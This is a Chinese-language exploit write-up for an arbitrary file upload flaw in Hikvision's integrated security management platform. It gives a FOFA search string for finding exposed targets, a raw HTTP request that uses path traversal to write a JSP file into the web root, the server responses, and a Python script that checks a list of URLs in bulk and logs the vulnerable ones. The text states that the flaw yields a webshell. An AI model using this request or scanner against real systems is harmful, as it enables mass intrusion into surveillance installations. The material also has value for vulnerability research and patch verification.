申明:本文仅供技术学习参考使用,请勿用作违法用途,否则后果自负。
一、漏洞名称
HiKVISION综合安防管理平台report任意文件上传
二、漏洞影响
HIKVISION-综合安防管理平台
三、漏洞描述
HiKVISION 综合安防管理平台 report接口存在任意文件上传漏洞,攻击者通过构造特殊的请求包可以上传任意文件,可以利用此漏洞获得webshell
四、资产FOFA搜索语句
app="HIKVISION-综合安防管理平台"或title="综合安防管理平台"
五、漏洞复现
向目标发送如下请求数据包,其中字符串ndbmaabfueriigbjadss12345是上传的jsp文件的内容
POST /svm/api/external/report HTTP/1.1Host: xx.xx.xx.xx:80User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcerblvm------WebKitFormBoundarykcerblvmContent-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/mctc.jsp"Content-Type: application/zip<%out.print(43000 * 42955);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>------WebKitFormBoundarykcerblvm--
收到响应数据包如下,其中path字段表示文件访问路径
HTTP/1.1 200Access-Control-Allow-Credentials: trueAccess-Control-Allow-Methods: POST, GET, OPTIONS, DELETE, PUT,PATCH, HEADSet-Cookie: JSESSIONID=AC0007173662DB74E766A9F96350B19B; Path=/svm; HttpOnlyTraceid: 5efca7490dd08eb3Pragma: no-cacheExpires: 0Access-Control-Allow-Headers: Content-TypeAccess-Control-Max-Age: 3600Content-Length: 69Content-Type: application/json;charset=UTF-8Cache-Control: no-cacheAccess-Control-Allow-Origin: http://xx.xx.xx.xx:8001/centerDate: Sun, 13 Aug 2023 23:26:47 GMT{"code":"0x26e31402","msg":"上报的文件格式错误","data":null}
然后访问:
http://xx.xx.xx.xx:80/portal/ui/login/..;/..;/mctc.jsp响应内容如下
HTTP/1.1 200Date: Sun, 13 Aug 2023 23:26:47 GMTContent-Type: text/html;charset=ISO-8859-1Set-Cookie: JSESSIONID=YTczNGI4ZDUtYmZiOC00ODMzLWIxNTItYmQwYzllNzhkYmQ5; Path=/portal; HttpOnly; SameSite=Lax1847065000
页面内容中包含1847065000证明存在该漏洞
六、批量漏洞验证poc
该python脚本可以批量检测漏洞,C:\Users\DELL\Desktop\1003.txt为输入目标文件,每行是一个url
import argparseimport timeimport requestsdef get_url(file):with open('{}'.format(file),'r',encoding='utf-8') as f:for i in f:i = i.replace('\n', '')send_req(i)def write_result(content):f = open("result.txt", "a", encoding="UTF-8")f.write('{}\n'.format(content))f.close()def send_req(url_check):print('{} runing Check'.format(url_check))url = url_check + '/svm/api/external/report'header = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69','Content-Type':'multipart/form-data; boundary=----WebKitFormBoundarykcerblvm'}data = ("------WebKitFormBoundarykcerblvm"'Content-Disposition: form-data; name="file";\r\n''filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/mctc.jsp"\r\n'"Content-Type: application/zip\r\n""\r\n"'<%out.print(43000 * 42955);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\r\n'"\r\n""------WebKitFormBoundarykcerblvm--")try:requests.packages.urllib3.disable_warnings()response = requests.post(url=url,headers=header,data=data,verify=False,timeout=3)print(response.text)url2 = "{}/portal/ui/login/..;/..;/mctc.jsp".format(url_check)res2 = requests.get(url2)print(res2.text)if response.status_code == 200 and res2.status_code == 200 and "1847065000" in res2.text:result = '{} 存在任意文件上传漏洞! 请访问目标自测:{} \n'.format(url_check,url2)print(result)write_result(result)time.sleep(1)except Exception as e:passif __name__ == '__main__':file = r"C:\Users\DELL\Desktop\1003.txt"get_url(file)